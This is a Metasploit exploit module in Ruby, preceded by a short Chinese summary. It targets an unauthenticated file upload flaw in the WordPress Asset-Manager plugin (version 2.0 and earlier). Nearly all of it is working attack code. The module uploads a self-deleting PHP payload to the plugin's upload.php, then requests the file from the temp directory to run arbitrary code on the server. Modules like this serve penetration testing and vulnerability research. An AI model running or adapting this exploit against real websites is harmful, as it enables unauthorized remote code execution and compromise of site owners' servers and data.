这个模块对应 Metasploit 漏洞库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的利用模块。该插件的 upload.php 允许未经身份验证的用户上传 PHP 文件到 wp-content/uploads/assets/temp/ 临时目录，随后通过 HTTP 请求该文件即可执行任意代码。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
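# Framework core plus the PhpEXE mixin that provides get_write_exec_payload.
require 'msf/core'
require 'msf/core/exploit/php_exe'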
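# Unauthenticated PHP file upload in the WordPress Asset-Manager plugin
# (<= 2.0). upload.php accepts a multipart "Filedata" field without any
# authentication and stores it under wp-content/uploads/assets/temp/; a
# follow-up GET to that path executes the uploaded PHP.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata, references and the TARGETURI option (path to the
  # WordPress install; plugin and upload paths are appended to it).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          # A NUL byte inside the uploaded PHP source would truncate it on disk.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Two-step exploitation:
  #   1. POST the PHP payload as a multipart "Filedata" upload to
  #      wp-content/plugins/asset-manager/upload.php (no credentials needed).
  #   2. GET wp-content/uploads/assets/temp/<name>.php so the web server runs it.
  #
  # The payload is generated with :unlink_self so it removes its own file once
  # it runs. If step 2 never reaches the file (execution fails or is blocked),
  # the uploaded <name>.php remains on the target and must be cleaned up by hand.
  #
  # Raises via fail_with on a missing/non-200 upload response, or when the
  # upload response does not echo the file name back.
  def exploit
    # Build a copy of the path rather than appending to the string owned by the
    # URI object returned by target_uri.
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Random alphabetic name with a .php extension; only [A-Za-z] plus ".php".
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the CRLF that precedes the first boundary marker in the serialized
    # message so the body starts directly with the boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # upload.php echoes the stored file name on success; use a plain substring
    # test instead of interpolating the name into a regex (the "." in ".php"
    # would otherwise match any character).
    if res.nil? || res.code != 200 || !res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is tolerated here: a running payload may never return an
    # HTTP reply. Only an explicit non-200 status is treated as failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end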